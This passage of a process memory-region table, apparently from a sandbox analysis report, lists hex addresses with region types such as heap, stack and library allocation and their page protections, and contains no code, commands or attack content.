page execute and read and write
|
||
1A57D0AB000
|
heap
|
page read and write
|
||
1A57C68D000
|
heap
|
page read and write
|
||
8701000
|
trusted library allocation
|
page read and write
|
||
B3D37FF000
|
stack
|
page read and write
|
||
8133000
|
heap
|
page read and write
|
||
227FF861000
|
heap
|
page read and write
|
||
55D2000
|
trusted library allocation
|
page read and write
|
||
2F51000
|
trusted library allocation
|
page read and write
|
||
4F0B000
|
trusted library allocation
|
page read and write
|
||
4980000
|
trusted library allocation
|
page read and write
|
||
5664000
|
trusted library allocation
|
page read and write
|
||
2AC5AA93000
|
heap
|
page read and write
|
||
6E5E000
|
stack
|
page read and write
|
||
76D0000
|
trusted library allocation
|
page execute and read and write
|
||
5C2A000
|
heap
|
page read and write
|
||
2AC5AA3F000
|
heap
|
page read and write
|
||
6210000
|
trusted library allocation
|
page read and write
|
||
43AE000
|
stack
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5AAA7000
|
heap
|
page read and write
|
||
1A57C8DF000
|
heap
|
page read and write
|
||
5577000
|
trusted library allocation
|
page read and write
|
||
5126000
|
trusted library allocation
|
page read and write
|
||
2AC5D082000
|
heap
|
page read and write
|
||
8280000
|
trusted library allocation
|
page read and write
|
||
4E2A000
|
trusted library allocation
|
page read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
8130000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
564F000
|
trusted library allocation
|
page read and write
|
||
5F1B000
|
trusted library allocation
|
page read and write
|
||
5300000
|
trusted library allocation
|
page read and write
|
||
227FF850000
|
heap
|
page read and write
|
||
2AC58B3D000
|
heap
|
page read and write
|
||
4D62000
|
trusted library allocation
|
page read and write
|
||
4EEC000
|
trusted library allocation
|
page read and write
|
||
2F36000
|
trusted library allocation
|
page execute and read and write
|
||
42AE000
|
stack
|
page read and write
|
||
5319000
|
trusted library allocation
|
page read and write
|
||
6AEA000
|
stack
|
page read and write
|
||
4D6D000
|
trusted library allocation
|
page read and write
|
||
8910000
|
trusted library section
|
page read and write
|
||
6600000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5D053000
|
heap
|
page read and write
|
||
2AC5AA68000
|
heap
|
page read and write
|
||
5437000
|
trusted library allocation
|
page read and write
|
||
42E0000
|
heap
|
page execute and read and write
|
||
1A57D049000
|
heap
|
page read and write
|
||
4063000
|
trusted library allocation
|
page read and write
|
||
4D71000
|
trusted library allocation
|
page read and write
|
||
7E70000
|
heap
|
page read and write
|
||
8110000
|
trusted library allocation
|
page read and write
|
||
4C30000
|
trusted library allocation
|
page execute and read and write
|
||
57BF000
|
trusted library allocation
|
page read and write
|
||
1A57ABC2000
|
heap
|
page read and write
|
||
5527000
|
trusted library allocation
|
page read and write
|
||
52B7000
|
trusted library allocation
|
page read and write
|
||
2AC5C96F000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
5A48000
|
trusted library allocation
|
page read and write
|
||
AC7000
|
heap
|
page read and write
|
||
53F5000
|
trusted library allocation
|
page read and write
|
||
59CE000
|
stack
|
page read and write
|
||
8A81000
|
trusted library allocation
|
page read and write
|
||
4897000
|
heap
|
page read and write
|
||
1A57C7DF000
|
heap
|
page read and write
|
||
2AC5AA50000
|
heap
|
page read and write
|
||
9321000
|
trusted library allocation
|
page read and write
|
||
55C8000
|
trusted library allocation
|
page read and write
|
||
2AC5CFE7000
|
heap
|
page read and write
|
||
1A57C7DF000
|
heap
|
page read and write
|
||
2D37000
|
heap
|
page read and write
|
||
57FF000
|
stack
|
page read and write
|
||
5665000
|
trusted library allocation
|
page read and write
|
||
1A57ABAA000
|
heap
|
page read and write
|
||
372E000
|
trusted library allocation
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
2AC58BDA000
|
heap
|
page read and write
|
||
1A57D12C000
|
heap
|
page read and write
|
||
8410000
|
trusted library allocation
|
page execute and read and write
|
||
5C0E000
|
stack
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
764E000
|
stack
|
page read and write
|
||
1A57C55A000
|
heap
|
page read and write
|
||
6FFB000
|
stack
|
page read and write
|
||
2AC5AAF7000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A578CAE000
|
heap
|
page read and write
|
||
50CA000
|
trusted library allocation
|
page read and write
|
||
4870000
|
trusted library allocation
|
page read and write
|
||
2AC5CAC8000
|
heap
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
8420000
|
trusted library allocation
|
page execute and read and write
|
||
1A57D0D6000
|
heap
|
page read and write
|
||
2710000
|
heap
|
page read and write
|
||
1A578DFE000
|
heap
|
page read and write
|
||
29FE000
|
stack
|
page read and write
|
||
53BE000
|
trusted library allocation
|
page read and write
|
||
4DD4000
|
trusted library allocation
|
page read and write
|
||
5174000
|
trusted library allocation
|
page read and write
|
||
73D1F000
|
unkown
|
page readonly
|
||
2AC5AB17000
|
heap
|
page read and write
|
||
36C4000
|
trusted library allocation
|
page read and write
|
||
F16C3FF000
|
stack
|
page read and write
|
||
53EE000
|
trusted library allocation
|
page read and write
|
||
4ED3000
|
trusted library allocation
|
page read and write
|
||
1A57D09D000
|
heap
|
page read and write
|
||
2AC5C66E000
|
heap
|
page read and write
|
||
1A57C58E000
|
heap
|
page read and write
|
||
4DCE000
|
trusted library allocation
|
page read and write
|
||
532A000
|
trusted library allocation
|
page read and write
|
||
1A57D0E9000
|
heap
|
page read and write
|
||
7E6E000
|
stack
|
page read and write
|
||
586C2A6000
|
stack
|
page read and write
|
||
55D0000
|
trusted library allocation
|
page read and write
|
||
2AC5C61C000
|
heap
|
page read and write
|
||
4DED000
|
trusted library allocation
|
page read and write
|
||
1A57D104000
|
heap
|
page read and write
|
||
2AC5AA43000
|
heap
|
page read and write
|
||
8400000
|
trusted library section
|
page read and write
|
||
2786000
|
trusted library allocation
|
page read and write
|
||
2350000
|
trusted library allocation
|
page read and write
|
||
4E2E000
|
trusted library allocation
|
page read and write
|
||
1A57D09C000
|
heap
|
page read and write
|
||
673000
|
trusted library allocation
|
page execute and read and write
|
||
37ED000
|
trusted library allocation
|
page read and write
|
||
4F65000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
trusted library allocation
|
page read and write
|
||
8120000
|
heap
|
page read and write
|
||
1A57CCB2000
|
heap
|
page read and write
|
||
352D000
|
trusted library allocation
|
page read and write
|
||
52DD000
|
trusted library allocation
|
page read and write
|
||
6410000
|
trusted library allocation
|
page read and write
|
||
519C000
|
trusted library allocation
|
page read and write
|
||
1A57BDFD000
|
heap
|
page read and write
|
||
4E28000
|
trusted library allocation
|
page read and write
|
||
7433000
|
heap
|
page read and write
|
||
2AC5CA71000
|
heap
|
page read and write
|
||
374E000
|
trusted library allocation
|
page read and write
|
||
1A57AACF000
|
heap
|
page read and write
|
||
1A578CAB000
|
heap
|
page read and write
|
||
4E00000
|
trusted library allocation
|
page read and write
|
||
290C000
|
stack
|
page read and write
|
||
227FF8A2000
|
heap
|
page read and write
|
||
2AC5AA3B000
|
heap
|
page read and write
|
||
4CDA000
|
trusted library allocation
|
page read and write
|
||
2AC5D093000
|
heap
|
page read and write
|
||
1A57C500000
|
heap
|
page read and write
|
||
2AC5AA90000
|
heap
|
page read and write
|
||
461D000
|
stack
|
page read and write
|
||
6F67000
|
trusted library allocation
|
page read and write
|
||
1A57D08F000
|
heap
|
page read and write
|
||
1A57D10C000
|
heap
|
page read and write
|
||
5644000
|
trusted library allocation
|
page read and write
|
||
8F61000
|
trusted library allocation
|
page read and write
|
||
F16BF2A000
|
stack
|
page read and write
|
||
7210000
|
trusted library allocation
|
page execute and read and write
|
||
55C2000
|
trusted library allocation
|
page read and write
|
||
36AD000
|
trusted library allocation
|
page read and write
|
||
2D4E000
|
stack
|
page read and write
|
||
2A3F000
|
stack
|
page read and write
|
||
A80000
|
trusted library allocation
|
page read and write
|
||
4F1A000
|
trusted library allocation
|
page read and write
|
||
36B4000
|
trusted library allocation
|
page read and write
|
||
2AC5BD80000
|
heap
|
page read and write
|
||
55B3000
|
trusted library allocation
|
page read and write
|
||
54FC000
|
trusted library allocation
|
page read and write
|
||
4EF6000
|
trusted library allocation
|
page read and write
|
||
6BEB000
|
stack
|
page read and write
|
||
3734000
|
trusted library allocation
|
page read and write
|
||
227FF7E0000
|
heap
|
page read and write
|
||
9A8C000
|
heap
|
page read and write
|
||
9C80000
|
trusted library allocation
|
page read and write
|
||
1A57C8DF000
|
heap
|
page read and write
|
||
1A578CA9000
|
heap
|
page read and write
|
||
5690000
|
trusted library allocation
|
page execute and read and write
|
||
2AC58BAA000
|
heap
|
page read and write
|
||
227FF8A3000
|
heap
|
page read and write
|
||
1A57CF4A000
|
heap
|
page read and write
|
||
1A57CD38000
|
heap
|
page read and write
|
||
52D9000
|
trusted library allocation
|
page read and write
|
||
54C1000
|
trusted library allocation
|
page read and write
|
||
68DE000
|
stack
|
page read and write
|
||
1A57AAC9000
|
heap
|
page read and write
|
||
6F86000
|
heap
|
page read and write
|
||
1A57CBC3000
|
heap
|
page read and write
|
||
2AC58D88000
|
heap
|
page read and write
|
||
2A72000
|
trusted library allocation
|
page read and write
|
||
1281000
|
heap
|
page read and write
|
||
2AC58BFE000
|
heap
|
page read and write
|
||
5622000
|
trusted library allocation
|
page read and write
|
||
6770000
|
heap
|
page read and write
|
||
292E000
|
trusted library allocation
|
page read and write
|
||
5240000
|
trusted library section
|
page read and write
|
||
7560000
|
trusted library allocation
|
page read and write
|
||
1A57AAA7000
|
heap
|
page read and write
|
||
F16CAFE000
|
stack
|
page read and write
|
||
5790000
|
trusted library allocation
|
page read and write
|
||
11D6000
|
heap
|
page read and write
|
||
52BB000
|
trusted library allocation
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
3E2000
|
unkown
|
page readonly
|
||
5B1A000
|
heap
|
page read and write
|
||
1A57D0D6000
|
heap
|
page read and write
|
||
5194000
|
trusted library allocation
|
page read and write
|
||
6DAF000
|
stack
|
page read and write
|
||
2740000
|
heap
|
page read and write
|
||
348000
|
unkown
|
page execute read
|
||
7CEC000
|
trusted library allocation
|
page read and write
|
||
9A82000
|
heap
|
page read and write
|
||
1A57D083000
|
heap
|
page read and write
|
||
50C8000
|
trusted library allocation
|
page read and write
|
||
2AC5C66E000
|
heap
|
page read and write
|
||
2AC58D80000
|
heap
|
page read and write
|
||
1A578CAA000
|
heap
|
page read and write
|
||
4DE9000
|
trusted library allocation
|
page read and write
|
||
1A57CE49000
|
heap
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
5A90000
|
trusted library allocation
|
page read and write
|
||
5185000
|
trusted library allocation
|
page read and write
|
||
4960000
|
trusted library allocation
|
page read and write
|
||
2AC5AB30000
|
heap
|
page read and write
|
||
559E000
|
trusted library allocation
|
page read and write
|
||
5051000
|
trusted library allocation
|
page read and write
|
||
50FA000
|
trusted library allocation
|
page read and write
|
||
4F3B000
|
trusted library allocation
|
page read and write
|
||
7FFB23B00000
|
unkown
|
page readonly
|
||
775E000
|
stack
|
page read and write
|
||
2AC5C471000
|
heap
|
page read and write
|
||
2D20000
|
trusted library section
|
page read and write
|
||
5620000
|
trusted library allocation
|
page read and write
|
||
1A57BDFD000
|
heap
|
page read and write
|
||
4B60000
|
trusted library section
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
1A57AB87000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
713E000
|
stack
|
page read and write
|
||
5A40000
|
trusted library allocation
|
page read and write
|
||
7FFB23B20000
|
unkown
|
page read and write
|
||
1190000
|
trusted library allocation
|
page read and write
|
||
551E000
|
trusted library allocation
|
page read and write
|
||
5521000
|
trusted library allocation
|
page read and write
|
||
2AC5C670000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
3146000
|
trusted library allocation
|
page read and write
|
||
1A57D083000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
5B3E000
|
heap
|
page read and write
|
||
55A9000
|
trusted library allocation
|
page read and write
|
||
5373000
|
trusted library allocation
|
page read and write
|
||
52BD000
|
trusted library allocation
|
page read and write
|
||
3760000
|
trusted library allocation
|
page read and write
|
||
55F6000
|
trusted library allocation
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
5506000
|
trusted library allocation
|
page read and write
|
||
4F20000
|
trusted library allocation
|
page execute and read and write
|
||
4E11000
|
trusted library allocation
|
page read and write
|
||
519A000
|
trusted library allocation
|
page read and write
|
||
297E000
|
stack
|
page read and write
|
||
5057000
|
trusted library allocation
|
page read and write
|
||
61F2000
|
trusted library allocation
|
page read and write
|
||
37FC000
|
trusted library allocation
|
page read and write
|
||
50B7000
|
trusted library allocation
|
page read and write
|
||
73D01000
|
unkown
|
page execute read
|
||
2AC5D07B000
|
heap
|
page read and write
|
||
54D6000
|
trusted library allocation
|
page read and write
|
||
2AC5AA59000
|
heap
|
page read and write
|
||
2AC5AACB000
|
heap
|
page read and write
|
||
7317000
|
trusted library allocation
|
page read and write
|
||
4DFE000
|
trusted library allocation
|
page read and write
|
||
2CD1000
|
heap
|
page read and write
|
||
1A57D0CA000
|
heap
|
page read and write
|
||
5A50000
|
trusted library allocation
|
page read and write
|
||
1A57AB03000
|
heap
|
page read and write
|
||
5159000
|
trusted library allocation
|
page read and write
|
||
586C6FF000
|
stack
|
page read and write
|
||
541E000
|
stack
|
page read and write
|
||
1A578DA8000
|
heap
|
page read and write
|
||
1A578DAB000
|
heap
|
page read and write
|
||
5B5E000
|
heap
|
page read and write
|
||
1A57D05C000
|
heap
|
page read and write
|
||
227FF887000
|
heap
|
page read and write
|
||
7090000
|
trusted library allocation
|
page read and write
|
||
2AC5CBC7000
|
heap
|
page read and write
|
||
5079000
|
trusted library allocation
|
page read and write
|
||
1110000
|
heap
|
page read and write
|
||
7FFB23B25000
|
unkown
|
page readonly
|
||
5D0000
|
heap
|
page read and write
|
||
7FFB23B22000
|
unkown
|
page readonly
|
||
6400000
|
trusted library allocation
|
page read and write
|
||
825E000
|
stack
|
page read and write
|
||
2AC5AB07000
|
heap
|
page read and write
|
||
1A57D05D000
|
heap
|
page read and write
|
||
55E9000
|
trusted library allocation
|
page read and write
|
||
4DA3000
|
trusted library allocation
|
page read and write
|
||
4C6E000
|
stack
|
page read and write
|
||
1A57ABA0000
|
heap
|
page read and write
|
||
2AC5C96E000
|
heap
|
page read and write
|
||
50B9000
|
trusted library allocation
|
page read and write
|
||
50E3000
|
trusted library allocation
|
page read and write
|
||
2A69000
|
trusted library allocation
|
page read and write
|
||
4E30000
|
trusted library allocation
|
page read and write
|
||
2A80000
|
trusted library allocation
|
page read and write
|
||
1A578DAB000
|
heap
|
page read and write
|
||
6200000
|
trusted library allocation
|
page read and write
|
||
3F51000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
342A000
|
trusted library allocation
|
page read and write
|
||
2AC5CFD7000
|
heap
|
page read and write
|
||
1530000
|
trusted library allocation
|
page read and write
|
||
5172000
|
trusted library allocation
|
page read and write
|
||
816000
|
heap
|
page read and write
|
||
39E3000
|
trusted library allocation
|
page read and write
|
||
52E5000
|
trusted library allocation
|
page read and write
|
||
5096000
|
trusted library allocation
|
page read and write
|
||
5352000
|
trusted library allocation
|
page read and write
|
||
1A57C6DE000
|
heap
|
page read and write
|
||
69AD000
|
stack
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
534B000
|
trusted library allocation
|
page read and write
|
||
3358000
|
trusted library allocation
|
page read and write
|
||
505D000
|
trusted library allocation
|
page read and write
|
||
2AC5C61C000
|
heap
|
page read and write
|
||
7FB0000
|
trusted library allocation
|
page read and write
|
||
5D79000
|
trusted library allocation
|
page read and write
|
||
2AC5D0E7000
|
heap
|
page read and write
|
||
8340000
|
trusted library allocation
|
page read and write
|
||
5634000
|
trusted library allocation
|
page read and write
|
||
1A57AAAB000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page execute and read and write
|
||
83E0000
|
trusted library allocation
|
page read and write
|
||
2AC5C621000
|
heap
|
page read and write
|
||
4ED1000
|
trusted library allocation
|
page read and write
|
||
712C000
|
stack
|
page read and write
|
||
5641000
|
trusted library allocation
|
page read and write
|
||
5124000
|
trusted library allocation
|
page read and write
|
||
4E7D000
|
trusted library allocation
|
page read and write
|
||
4E2C000
|
trusted library allocation
|
page read and write
|
||
513F000
|
trusted library allocation
|
page read and write
|
||
2AC5AA49000
|
heap
|
page read and write
|
||
1A57CB3A000
|
heap
|
page read and write
|
||
8690000
|
trusted library section
|
page read and write
|
||
7F5C0000
|
trusted library allocation
|
page execute and read and write
|
||
4F10000
|
trusted library allocation
|
page execute and read and write
|
||
9AE3000
|
heap
|
page read and write
|
||
55B5000
|
trusted library allocation
|
page read and write
|
||
5296000
|
trusted library allocation
|
page read and write
|
||
2AC58B4F000
|
heap
|
page read and write
|
||
768E000
|
stack
|
page read and write
|
||
42B0000
|
trusted library allocation
|
page read and write
|
||
1A57CE3D000
|
heap
|
page read and write
|
||
2AC5AA93000
|
heap
|
page read and write
|
||
1A57AC55000
|
heap
|
page read and write
|
||
2AC5CFF1000
|
heap
|
page read and write
|
||
2AC5ABF0000
|
heap
|
page read and write
|
||
506C000
|
trusted library allocation
|
page read and write
|
||
2D00000
|
heap
|
page read and write
|
||
2AC5D0B5000
|
heap
|
page read and write
|
||
432F000
|
stack
|
page read and write
|
||
8850000
|
trusted library allocation
|
page execute and read and write
|
||
11BE000
|
heap
|
page read and write
|
||
5334000
|
trusted library allocation
|
page read and write
|
||
54B9000
|
trusted library allocation
|
page read and write
|
||
6780000
|
trusted library allocation
|
page read and write
|
||
1A57C940000
|
heap
|
page read and write
|
||
4E5E000
|
trusted library allocation
|
page read and write
|
||
1A57D12C000
|
heap
|
page read and write
|
||
2AC5AC2E000
|
heap
|
page read and write
|
||
7F3B0000
|
trusted library allocation
|
page execute and read and write
|
||
5630000
|
trusted library allocation
|
page read and write
|
||
7790000
|
trusted library allocation
|
page read and write
|
||
8680000
|
trusted library allocation
|
page execute and read and write
|
||
7080000
|
trusted library allocation
|
page read and write
|
||
535C000
|
trusted library allocation
|
page read and write
|
||
227FF8E9000
|
heap
|
page read and write
|
||
589D000
|
stack
|
page read and write
|
||
F16C6FE000
|
stack
|
page read and write
|
||
5407000
|
trusted library allocation
|
page read and write
|
||
550A000
|
trusted library allocation
|
page read and write
|
||
2F77000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
351000
|
unkown
|
page write copy
|
||
2AC5D0B1000
|
heap
|
page read and write
|
||
72EF000
|
stack
|
page read and write
|
||
2F30000
|
trusted library allocation
|
page read and write
|
||
692000
|
trusted library allocation
|
page read and write
|
||
1A57CB2D000
|
heap
|
page read and write
|
||
5D6000
|
heap
|
page read and write
|
||
61E000
|
stack
|
page read and write
|
||
2AC5CD28000
|
heap
|
page read and write
|
||
33F9000
|
trusted library allocation
|
page read and write
|
||
2AC5C86F000
|
heap
|
page read and write
|
||
352000
|
unkown
|
page readonly
|
||
1A57D11C000
|
heap
|
page read and write
|
||
2ECE000
|
stack
|
page read and write
|
||
50AD000
|
trusted library allocation
|
page read and write
|
||
2AC5C8BD000
|
heap
|
page read and write
|
||
1A57CF49000
|
heap
|
page read and write
|
||
6EEC000
|
trusted library allocation
|
page read and write
|
||
1A57D04A000
|
heap
|
page read and write
|
||
1A57AC81000
|
heap
|
page read and write
|
||
5349000
|
trusted library allocation
|
page read and write
|
||
1A57D11C000
|
heap
|
page read and write
|
||
1A57CADD000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
29B0000
|
heap
|
page read and write
|
||
2840000
|
trusted library section
|
page read and write
|
||
9CF6000
|
trusted library allocation
|
page read and write
|
||
534E000
|
trusted library allocation
|
page read and write
|
||
2E40000
|
heap
|
page read and write
|
||
4DF9000
|
stack
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
1A57D08F000
|
heap
|
page read and write
|
||
1A57D104000
|
heap
|
page read and write
|
||
1A57C6E0000
|
heap
|
page read and write
|
||
4D9C000
|
trusted library allocation
|
page read and write
|
||
586C7FE000
|
stack
|
page read and write
|
||
87D0000
|
trusted library allocation
|
page read and write
|
||
66ED000
|
trusted library allocation
|
page read and write
|
||
1A57AAB0000
|
heap
|
page read and write
|
||
4D4F000
|
trusted library allocation
|
page read and write
|
||
2AB0000
|
heap
|
page readonly
|
||
1A57D064000
|
heap
|
page read and write
|
||
56E0000
|
trusted library allocation
|
page read and write
|
||
1A57D10C000
|
heap
|
page read and write
|
||
5520000
|
trusted library allocation
|
page execute and read and write
|
||
2F42000
|
trusted library allocation
|
page read and write
|
||
2AC58AC0000
|
heap
|
page read and write
|
||
5AB0000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5C66E000
|
heap
|
page read and write
|
||
55F4000
|
trusted library allocation
|
page read and write
|
||
61BE000
|
stack
|
page read and write
|
||
5104000
|
trusted library allocation
|
page read and write
|
||
530F000
|
trusted library allocation
|
page read and write
|
||
1A57D081000
|
heap
|
page read and write
|
||
7310000
|
trusted library allocation
|
page read and write
|
||
5114000
|
trusted library allocation
|
page read and write
|
||
8830000
|
trusted library allocation
|
page execute and read and write
|
||
2710000
|
trusted library allocation
|
page read and write
|
||
2AC58B29000
|
heap
|
page read and write
|
||
5A98000
|
trusted library allocation
|
page read and write
|
||
6270000
|
trusted library allocation
|
page read and write
|
||
5A4C000
|
stack
|
page read and write
|
||
5271000
|
trusted library allocation
|
page read and write
|
||
1A57D0D6000
|
heap
|
page read and write
|
||
5108000
|
trusted library allocation
|
page read and write
|
||
2D6C000
|
trusted library allocation
|
page read and write
|
||
2860000
|
heap
|
page read and write
|
||
2AC58D8A000
|
heap
|
page read and write
|
||
5C10000
|
trusted library allocation
|
page read and write
|
||
4D86000
|
trusted library allocation
|
page read and write
|
||
1A57C5CD000
|
heap
|
page read and write
|
||
2AC5CAC7000
|
heap
|
page read and write
|
||
655D000
|
stack
|
page read and write
|
||
2AC5D093000
|
heap
|
page read and write
|
||
14ED000
|
trusted library allocation
|
page execute and read and write
|
||
6EC0000
|
heap
|
page read and write
|
||
43B0000
|
trusted library allocation
|
page read and write
|
||
2AC58B6F000
|
heap
|
page read and write
|
||
55B7000
|
trusted library allocation
|
page read and write
|
||
1A57CD39000
|
heap
|
page read and write
|
||
2AC5CAC7000
|
heap
|
page read and write
|
||
2A7A000
|
trusted library allocation
|
page execute and read and write
|
||
5615000
|
trusted library allocation
|
page read and write
|
||
1A57D064000
|
heap
|
page read and write
|
||
5F9C000
|
trusted library allocation
|
page read and write
|
||
5644000
|
trusted library allocation
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
76CD000
|
stack
|
page read and write
|
||
2866000
|
heap
|
page read and write
|
||
5403000
|
trusted library allocation
|
page read and write
|
||
1A57D057000
|
heap
|
page read and write
|
||
CAB000
|
stack
|
page read and write
|
||
57A0000
|
trusted library allocation
|
page read and write
|
||
5431000
|
trusted library allocation
|
page read and write
|
||
7E22000
|
trusted library allocation
|
page read and write
|
||
1A578CAE000
|
heap
|
page read and write
|
||
55CE000
|
trusted library allocation
|
page read and write
|
||
83A0000
|
trusted library allocation
|
page read and write
|
||
2AC5AC2E000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
53F0000
|
trusted library allocation
|
page read and write
|
||
31BD000
|
trusted library allocation
|
page read and write
|
||
9C8E000
|
trusted library allocation
|
page read and write
|
||
60A0000
|
trusted library allocation
|
page read and write
|
||
1A57D0CA000
|
heap
|
page read and write
|
||
2AC58B58000
|
heap
|
page read and write
|
||
5658000
|
trusted library allocation
|
page read and write
|
||
4D9E000
|
trusted library allocation
|
page read and write
|
||
14DE000
|
stack
|
page read and write
|
||
4D96000
|
trusted library allocation
|
page read and write
|
||
4890000
|
heap
|
page read and write
|
||
1A578CAB000
|
heap
|
page read and write
|
||
2AC5D019000
|
heap
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5D0AC000
|
heap
|
page read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
5610000
|
trusted library allocation
|
page read and write
|
||
11A0000
|
heap
|
page read and write
|
||
4DEB000
|
trusted library allocation
|
page read and write
|
||
2F60000
|
trusted library allocation
|
page read and write
|
||
23C0000
|
trusted library allocation
|
page read and write
|
||
2AC5CABC000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
538C000
|
trusted library allocation
|
page read and write
|
||
1A578D3B000
|
heap
|
page read and write
|
||
55AD000
|
trusted library allocation
|
page read and write
|
||
5668000
|
trusted library allocation
|
page read and write
|
||
B3D34FE000
|
stack
|
page read and write
|
||
5354000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5D0E2000
|
heap
|
page read and write
|
||
67D000
|
trusted library allocation
|
page execute and read and write
|
||
2278000
|
trusted library allocation
|
page read and write
|
||
72F0000
|
trusted library allocation
|
page read and write
|
||
1A57A750000
|
heap
|
page read and write
|
||
5534000
|
trusted library allocation
|
page read and write
|
||
562C000
|
trusted library allocation
|
page read and write
|
||
1A57C9DF000
|
heap
|
page read and write
|
||
2AC5C664000
|
heap
|
page read and write
|
||
2AC58D8E000
|
heap
|
page read and write
|
||
1A57AAA7000
|
heap
|
page read and write
|
||
5170000
|
trusted library allocation
|
page read and write
|
||
2F20000
|
trusted library allocation
|
page read and write
|
||
4ED5000
|
trusted library allocation
|
page read and write
|
||
36EE000
|
trusted library allocation
|
page read and write
|
||
6DDE000
|
stack
|
page read and write
|
||
70D0000
|
trusted library allocation
|
page read and write
|
||
156A000
|
heap
|
page read and write
|
||
1A57D0AB000
|
heap
|
page read and write
|
||
6E3D000
|
stack
|
page read and write
|
||
1A57C58E000
|
heap
|
page read and write
|
||
1A57CADD000
|
heap
|
page read and write
|
||
506E000
|
trusted library allocation
|
page read and write
|
||
1A578DAB000
|
heap
|
page read and write
|
||
2AC5B3F1000
|
heap
|
page read and write
|
||
2AC5C492000
|
heap
|
page read and write
|
||
2AA0000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
55DF000
|
trusted library allocation
|
page read and write
|
||
5198000
|
trusted library allocation
|
page read and write
|
||
4FA5000
|
heap
|
page read and write
|
||
509E000
|
trusted library allocation
|
page read and write
|
||
2A6D000
|
trusted library allocation
|
page execute and read and write
|
||
5094000
|
trusted library allocation
|
page read and write
|
||
7240000
|
trusted library allocation
|
page read and write
|
||
65F0000
|
trusted library allocation
|
page execute and read and write
|
||
52F8000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
2607000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
63CB000
|
stack
|
page read and write
|
||
6A0000
|
trusted library allocation
|
page read and write
|
||
586C4FD000
|
stack
|
page read and write
|
||
4EF4000
|
trusted library allocation
|
page read and write
|
||
37B0000
|
trusted library allocation
|
page read and write
|
||
67F0000
|
trusted library allocation
|
page execute and read and write
|
||
1A57D063000
|
heap
|
page read and write
|
||
2AC5AA5B000
|
heap
|
page read and write
|
||
7089000
|
trusted library allocation
|
page read and write
|
||
481E000
|
stack
|
page read and write
|
||
2AC5D02A000
|
heap
|
page read and write
|
||
6BAD000
|
stack
|
page read and write
|
||
48A1000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57AAF7000
|
heap
|
page read and write
|
||
2AC5CF06000
|
heap
|
page read and write
|
||
1A57AAFD000
|
heap
|
page read and write
|
||
5435000
|
trusted library allocation
|
page read and write
|
||
5154000
|
trusted library allocation
|
page read and write
|
||
4E82000
|
trusted library allocation
|
page read and write
|
||
563B000
|
trusted library allocation
|
page read and write
|
||
2A81000
|
trusted library allocation
|
page read and write
|
||
9CC0000
|
trusted library allocation
|
page read and write
|
||
1A57D11B000
|
heap
|
page read and write
|
||
503C000
|
trusted library allocation
|
page read and write
|
||
507B000
|
trusted library allocation
|
page read and write
|
||
7FFB1C302000
|
unkown
|
page readonly
|
||
B3D3FFF000
|
stack
|
page read and write
|
||
1A578D11000
|
heap
|
page read and write
|
||
3739000
|
trusted library allocation
|
page read and write
|
||
150A000
|
trusted library allocation
|
page execute and read and write
|
||
227FF7C0000
|
heap
|
page read and write
|
||
1A578D3C000
|
heap
|
page read and write
|
||
B3D39FE000
|
stack
|
page read and write
|
||
586CAFE000
|
stack
|
page read and write
|
||
A50000
|
trusted library allocation
|
page execute and read and write
|
||
1A578DAB000
|
heap
|
page read and write
|
||
2AC5C540000
|
heap
|
page read and write
|
||
1A57AAA9000
|
heap
|
page read and write
|
||
5680000
|
trusted library allocation
|
page read and write
|
||
4DD7000
|
trusted library allocation
|
page read and write
|
||
7C1000
|
heap
|
page read and write
|
||
33FF000
|
trusted library allocation
|
page read and write
|
||
74C000
|
stack
|
page read and write
|
||
1A57AAC0000
|
heap
|
page read and write
|
||
6432000
|
trusted library allocation
|
page read and write
|
||
6A01000
|
trusted library allocation
|
page read and write
|
||
5632000
|
trusted library allocation
|
page read and write
|
||
553A000
|
trusted library allocation
|
page read and write
|
||
36BA000
|
trusted library allocation
|
page read and write
|
||
73D1D000
|
unkown
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57CC39000
|
heap
|
page read and write
